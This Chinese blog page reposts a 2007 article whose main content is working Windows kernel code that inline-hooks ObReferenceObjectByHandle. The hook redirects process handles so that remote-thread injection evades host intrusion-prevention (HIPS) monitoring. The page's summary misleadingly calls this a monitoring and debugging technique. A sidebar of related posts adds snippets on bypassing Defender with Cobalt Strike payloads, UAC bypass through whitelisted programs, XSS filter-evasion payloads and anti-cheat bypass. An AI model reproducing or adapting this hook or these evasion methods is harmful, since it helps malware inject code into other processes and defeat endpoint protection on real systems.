bypass HIPS CreateRemoteThread Monitor

最新推荐文章于 2025-11-25 11:26:09 发布
原创 最新推荐文章于 2025-11-25 11:26:09 发布 · 766 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#object #access #thread #hook #汇编 #date

本文介绍了一种在Windows内核模式下Hook ObReferenceObjectByHandle函数的方法,通过修改该函数的跳转指令实现对特定进程的句柄引用行为进行拦截与重定向。此技术可用于系统监控、调试以及其他高级应用。
 Author:kruglinski(kruglinski_at_sohu_dot_com)
site:http://hi.baidu.com/kruglinski
date:2007.10.21

CreateThread
+CreateRemoteThread
+NtCreateThread
+PspCreateThread
+ObReferenceObjectByHandle

inline Hook ObReferenceObjectByHandle:

lkd> u nt!ObReferenceObjectByHandle
nt!ObReferenceObjectByHandle:
805bb050 8bff mov edi,edi
805bb052 55 push ebp
805bb053 8bec mov ebp,esp
805bb055 51 push ecx
805bb056 53 push ebx
805bb057 56 push esi
805bb058 57 push edi
805bb059 64a124010000 mov eax,dword ptr fs:[00000124h]



source code :

NTSTATUS __declspec(naked) Trampoline(
HANDLE Handle,
ACCESS_MASK DesiredAccess,
POBJECT_TYPE ObjectType,
KPROCESSOR_MODE AccessMode,
PVOID *Object,
POBJECT_HANDLE_INFORMATION HandleInformation
)
{
__asm
{
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
}
}

BOOLEAN EnableHook(void)
{
PBYTE pfnObRefByHandle=(PBYTE)&ObReferenceObjectByHandle;

ULONG uTotals=0;
ULONG uSize=0;

KdBreakPoint();

while(uTotals<5)
{
if(*pfnObRefByHandle==0xe9)
return FALSE;
uSize=Disasm((PBYTE)pfnObRefByHandle,15);//使用的是精简后OllyDbg的反汇编引擎
pfnObRefByHandle+=uSize;
uTotals+=uSize;
}

if(uTotals>32)
return FALSE;

//我很想用lock rep movsb来Copy内存,但不记得同时用lock和rep前缀是否有效
RtlCopyMemory(&Trampoline,&ObReferenceObjectByHandle,uTotals);

{
PBYTE pTramp=(PBYTE)&Trampoline;
pTramp+=uTotals;
*pTramp=0xe9;
pTramp++;
*(int*)pTramp=(int)pfnObRefByHandle-(int)(pTramp+4);

pTramp=(PBYTE)&Trampoline;
*(ULONG*)&pTramp[32-sizeof(ULONG)]=uTotals;
}

{
BYTE Jump[5]={0};
Jump[0]=0xe9;
*(int*)&Jump[1]=(int)&MyObRefObjByHandle-((int)&ObReferenceObjectByHandle+5);

RtlCopyMemory(&ObReferenceObjectByHandle,Jump,5);
}

return TRUE;
}

BOOLEAN DisableHook(void)
{
PBYTE pTramp=(PBYTE)&Trampoline;
ULONG uTotals=*(ULONG*)&pTramp[32-sizeof(ULONG)];

KdBreakPoint();

if(uTotals!=0x90909090)
{
RtlCopyMemory(&ObReferenceObjectByHandle,&Trampoline,uTotals);
return TRUE;
}

return FALSE;
}

NTSTATUS
MyObRefObjByHandle(
HANDLE Handle,
ACCESS_MASK DesiredAccess,
POBJECT_TYPE ObjectType,
KPROCESSOR_MODE AccessMode,
PVOID *Object,
POBJECT_HANDLE_INFORMATION HandleInformation
)
{
if(ObjectType==PsProcessType &&
Handle==NtCurrentProcess() &&
(
DesiredAccess==PROCESS_CREATE_THREAD ||
DesiredAccess==PROCESS_VM_OPERATION || //用CreateRemoteThread这几个操作是少不了的
DesiredAccess==PROCESS_VM_WRITE
) &&
AccessMode==UserMode &&//防止错误的把内核中的一些操作重定向
PsGetCurrentProcessId()==RemapID)//重定向进程ID相同
{
//修改Handle值
Handle=hRemapHandle;
}

return Trampoline(Handle,DesiredAccess,ObjectType,AccessMode,Object,HandleInformation);
}
Cobaltstrike bypass Defender
课嗨教育的专栏
03-16 1291
Defender一直是我们比较头疼的一个东西,相对于其他杀毒软件的可以退出关闭而言,Defender作为微软自带的一款杀毒软件,经常会在未经允许的情况下删除我们本地的东西。就很烦躁。刚好今天群里看到一篇文章,但是看着觉得眼熟,仔细看了下跟雷石以前的一篇文章很像,咱们本文就基于cs的exe马简单做个bypass defender的小总结。 参考: https://docs.microsoft.com/en-us/powershell/module/defender/remove-mpprefe...
ByPass UAC
yeanhoo的博客
09-24 1371
ByPass UAC 白名单程序 Bypass UAC 有些系统程序是直接获取管理员权限,而不触发UAC弹框的,这类程序称为白名单程序.例如, slui.exe、wusa.exe、taskmgr.exe、msra.exe、eudcedit.exe、eventvwr.exe、CompMgmtLauncher.exe等.这些 白名单程序可以通过DLL劫持、注入或是修改注册表执行命令的方式启动目标程序,实现Bypass UAC提权操作 利用CompMgmtLauncher.exe、该程序在启动时会查询注册
ByPass
AquariusYuxin的博客
11-15 8176
一、 什么是Bypass。 大家知道,网络安全设备一般都是应用在两个或更多的网络之间,比如内网和外网之间,网络安全设备内的应用程序会对通过他的网络封包来进行分析,以判断是否有威胁存在,处理完后再按照一定的路由规则将封包转发出去,而如果这台网络安全设备出现了故障,比如断电或死机后,那连接这台设备上所以网段也就彼此失去联系了,这个时候如果要求各个网络彼此还需要处于连通状态,那么就必须Bypass出面...
QEMU文档之bypass iommu
flyingnosky的专栏
03-30 1900
1 描述 通常存在一个全局开关来enable/disable vIOMMU。系统中所有的设备仅能通过vIOMMU或全部不通过,这样使使用非常不灵活。我们介绍bypass iommu属性来让设备可以通过也可以不通过vIOMMU。这对于在相同虚拟机上使用no-iommu模式的passthrough设备和通过vIOMMU的设备非常有用。 PCI host bridge也有一个bypass_iommu属性。该属性用于决定联结到PCI host bridge的设备是否bypass虚...
JTAG Bypass命令案例解析
zdx19880830的专栏
04-12 3138
JTAG Bypass命令案例解析Bypass命令是个什么鬼大侠的住处大侠传闻大侠圈中传闻大侠的事迹 Bypass命令是个什么鬼 曾经有朵黑色的云彩在我的大脑中翻江倒海,当N个设备组成一个菊花链的时候(跟花没关系,当然你也不用紧张),如何准确地访问其中的某个设备呢?不知道,不知道,不知道,真的不知道,只是传说中有个叫Bypass的家伙据说可以解决这个问题。好了,既然知道了Bypass传说中的超能力...
bypass功能介绍
weixin_43694286的博客
01-09 2万+
网络安全设备Bypass功能介绍及分析 网络安全平台厂商往往需要用到一项比较特殊的技术,那就是Bypass,那么到底什么是Bypass呢,Bypass设备又是如何来实现的?下面我就对Bypass技术做一下简单的介绍和说明。 什么是Bypass 大家知道,网络安全设备一般都是应用在两个或更多的网络之间,比如内网和外网之间,网络安全设备内的应用程序会对通过他的网络封包来进行分析,以判断是否有威胁存在,...
bypass】403绕过
热门推荐
qq_21193587的博客
06-03 3万+
403可能的原因: 1、你的IP被列入黑名单。 2、你在一定时间内过多地访问此网站(一般是用采集程序),被防火墙拒绝访问了。 3、网站域名解析到了空间,但空间未绑定此域名。 4、你的网页脚本文件在当前目录下没有执行权限。 5、在不允许写/创建文件的目录中执行了创建/写文件操作。 6、以http方式访问需要ssl连接的网址。 7、浏览器不支持SSL 128时访问SSL 128的连接。 8、在身份验证的过程中输入了错误的密码。 9、DNS解析错误,手动更改DNS服务器地址。 10、连接的用户过多,可以过后再试。
闲谈 bypass AV
Coisini的博客
06-23 5064
孩纸,看到AV别乱想~这里说的AV是AntiVirus。即杀软。(这些日子考试繁重,更的少了…) 本篇文章简单说一下本人平时常用的免杀工具以及其使用~ 0x00 Hyperion 第一个说说这个 Hyperion,因为比较轻量级~,为什么说轻量级呢,因为,360杀毒能检测出。。 其实 Hyperion 是一款加密工具,通过5轮AES加密来加密的你payload,加密完成后的payload是可以...
XSS Bypass
自学编程_youkewang.top
03-25 1731
XSS Bypass思路:1. 大小写绕过.2. 关键字替换.3. 编码绕过.Part 1.第1关: 无过滤.&lt;script&gt;alert(/xss/)&lt;/script 第2关: 过滤&lt;script&gt;标签,未考虑大小写问题.绕过思路: 大小写绕过.&lt;SCRIPT&gt;alert(/xss/)&lt;/SCRIPT&gt;第3关:过滤&lt;script&gt;关...
Xiaomi-HyperOS-BootLoader-Bypass
08-01
Xiaomi-HyperOS-BootLoader-Bypass相关知识点: Xiaomi-HyperOS-BootLoader-Bypass是专门针对小米设备的BootLoader解锁工具。BootLoader是嵌入在智能手机等设备上的固件,用于初始化硬件并加载操作系统。它通常在...
投稿文章:Bypass ESET NOD32 HIPS - 原创文章发布(Original Article) - T00LS -
08-03
【文章标题】:Bypass ESET NOD32 HIPS - 安全技术解析 【文章摘要】:本文主要探讨了在渗透测试过程中遇到的问题,即木马与C2(Command and Control)服务器通信时被ESET NOD32的主机入侵预防系统(HIPS)拦截,并...
bypass-paywalls-chrome-master_bypass_sitetemplate_
09-29
Bypass website paywalls
bypass-signcode-x3.xem_bypass_TheClient_XingCode_XIgnCode3ByPass
10-01
A host-based emulator bypass for Wellbia's XignCode3.Emulates the integrity-check for XignCode3 through a host-application.A host application launches/initializes XignCode3 causing XignCode3 to run ...
bypass_bypass_
09-29
適用於近期之xccode之過渡偵測方式之檔案
Visual studio 2022高亮汇编(ASM)语法方法
2302_80253020的博客
11-25 266
本文介绍了在Visual Studio 2022中为ASM文件添加语法高亮的方法:首先下载并解压usertype.zip文件,将其复制到VS2022安装目录;然后在工具选项的文本编辑器设置中,将asm扩展名关联到Microsoft Visual C++编辑器;最后重启VS2022即可实现语法高亮。需要注意的是,由于C++不识别汇编语言的分号注释,建议在分号后添加双斜杠(;//)来使注释显示为绿色。
【四旋翼飞行器】【模拟悬链机器人的动态】设计和控制由两个四旋翼飞行器推动的缆绳研究(Matlab代码实现)
11-26
【四旋翼飞行器】【模拟悬链机器人的动态】设计和控制由两个四旋翼飞行器推动的缆绳研究(Matlab代码实现)内容概要:本文围绕“设计和控制由两个四旋翼飞行器推动的缆绳系统”展开研究,通过建立动力学模型并利用Matlab进行仿真,模拟类似悬链机器人的动态行为。研究重点在于多无人机协同控制、缆绳张力分析及系统稳定性控制,结合非线性动力学与控制理论,实现对柔性连接负载的精确操控。文中提供了完整的Matlab代码实现,便于复现实验结果,适用于复杂空中作业任务的仿真验证。; 适合人群:具备一定控制理论基础和Matlab编程能力的研究生、科研人员及从事无人机协同控制、机器人系统开发的工程技术人员。; 使用场景及目标:①研究多无人机协同搬运与柔性负载控制;②掌握缆绳系统动力学建模与仿真方法;③应用于空中机器人、工业吊装、救援运输等实际场景的控制系统设计与优化; 阅读建议:建议结合Matlab代码逐模块分析,重点关注动力学建模、控制律设计与仿真结果验证部分,可进一步扩展至更多无人机协同或复杂环境干扰下的鲁棒性研究。
基于遗传算法的梯级水电站群联合火电厂优化调度研究(Python代码实现)
11-26
基于遗传算法的梯级水电站群联合火电厂优化调度研究(Python代码实现)内容概要:本文研究了基于遗传算法的梯级水电站群联合火电厂优化调度问题,旨在通过智能优化方法实现电力系统中水火电资源的协调调度,提升能源利用效率与调度经济性。文中构建了考虑水电站间水力联系、水库库容约束、机组出力特性及火电厂运行成本的综合优化模型,并采用遗传算法进行求解,给出了完整的Python代码实现。该方法能够有效处理复杂的非线性、多约束、多变量调度问题,具备良好的收敛性和实
无人机基于改进粒子群算法的无人机路径规划研究[和遗传算法、粒子群算法进行比较](Matlab代码实现)
最新发布
11-26
【无人机】基于改进粒子群算法的无人机路径规划研究[和遗传算法、粒子群算法进行比较](Matlab代码实现)内容概要:本文围绕基于改进粒子群算法的无人机路径规划展开研究,重点探讨了在复杂环境中利用改进粒子群算法(PSO)实现无人机三维路径规划的方法,并将其与遗传算法(GA)、标准粒子群算法等传统优化算法进行对比分析。研究内容涵盖路径规划的多目标优化、避障策略、航路点约束以及算法收敛性和寻优能力的评估,所有实验均通过Matlab代码实现,提供了完整的仿真验证流程。文章还提到了多种智能优化算法在无人机路径规划中的应用比较,突出了改进PSO在收敛速度和全局寻优方面的优势。; 适合人群:具备一定Matlab编程基础和优化算法知识的研究生、科研人员及从事无人机路径规划、智能优化算法研究的相关技术人员。; 使用场景及目标:①用于无人机在复杂地形或动态环境下的三维路径规划仿真研究;②比较不同智能优化算法(如PSO、GA、蚁群算法、RRT等)在路径规划中的性能差异;③为多目标优化问题提供算法选型和改进思路。; 阅读建议:建议读者结合文中提供的Matlab代码进行实践操作,重点关注算法的参数设置、适应度函数设计及路径约束处理方式,同时可参考文中提到的多种算法对比思路,拓展到其他智能优化算法的研究与改进中。
C语言编写的高效抢票工具ByPass
抢票助手ByPass是一款以C语言编程实现的软件,具有快速购买或预订车票的辅助功能。此软件专门针对需要大量购票,尤其是在火车票高峰期时的用户设计。其作用在于通过自动化处理,绕过官方购票网站的常规购票流程,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值